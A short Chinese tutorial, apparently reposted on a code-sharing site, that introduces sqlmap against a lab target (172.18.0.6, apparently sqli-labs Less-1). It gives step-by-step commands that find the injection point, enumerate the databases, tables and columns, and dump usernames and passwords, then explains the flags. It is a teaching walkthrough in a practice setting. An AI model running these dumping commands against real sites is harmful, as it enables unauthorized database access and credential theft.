sql注入利器SQLmap使用入门
0x0
sqlmap的源代码下载地址:http://sourceforge.net/projects/sqlmap/
代码写的很好,有兴趣可以去拜读一下,提高个人技术。
0x01进入环境(windown下攻击环境)
靶机:172.18.0.6
攻击机:172.18.0.2
0x02找到注入点
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1”
测试出数据库信息版本号等
0x03测试数据名
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1” –dbs
0x04查当前数据库
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1” –current-db
当前数据库security
0x05查询数据库下的表名
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1” –tables -D “security”
0x06查询数据库下的表名下的users字段
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1” –columns -D “security” -T “users”
0x07查询数据库下的表名下的users字段的内容
使用命令sqlmap.py -u “http://172.18.0.6/Less-1/?id=1″ –dump -C”id,password,username” -D “security” -T “users”
EOF:
-u 指定目标url
--dbs 列出数据库系统中的数据库
--current-db 列出当前使用的数据库
--tables 列出数据库中的数据表
--columns 列出数据表中的字段
--dump 获取指定的数据
说明
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是摆设,本站源码仅提供给会员学习使用!
7. 如遇到加密压缩包,请使用360解压,如遇到无法解压的请联系管理员
开心源码网 » sql注入利器SQLmap使用入门
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是摆设,本站源码仅提供给会员学习使用!
7. 如遇到加密压缩包,请使用360解压,如遇到无法解压的请联系管理员
开心源码网 » sql注入利器SQLmap使用入门
